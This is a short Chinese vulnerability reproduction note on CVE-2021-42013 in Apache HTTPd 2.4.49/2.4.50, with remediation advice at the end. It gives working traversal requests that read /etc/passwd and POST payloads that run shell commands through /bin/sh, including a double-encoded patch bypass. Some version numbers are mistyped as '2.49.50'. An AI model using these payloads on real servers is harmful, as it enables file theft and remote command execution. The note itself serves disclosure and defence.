漏洞简介
Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。
影响版本
Apache HTTPd 2.4.49
Apache HTTPd 2.4.50
漏洞条件
1.配置目录遍历,并且开启cgi mode
2.Apache HTTPd版本为2.4.49/2.4.50
3.存在cgi-bin和icons文件夹
漏洞复现
GET 请求包 目录穿越:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: z
h-CN,zh;q=0.9
Connection: close
payload:
/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
POST 请求包 命令执行:
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
echo;whoami
payload:
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
echo;whoami
Apache HTTPd 2.49.50对上一个版本的修复不完整,导致50版本也存在该漏洞
GET payload:
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
POST payload:
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;whoami
在上一个版本payload的基础上再进行一次url编码即可
修复建议
1.升级至2.49.50以上版本
2.关闭目录遍历功能
3.关闭cgi mode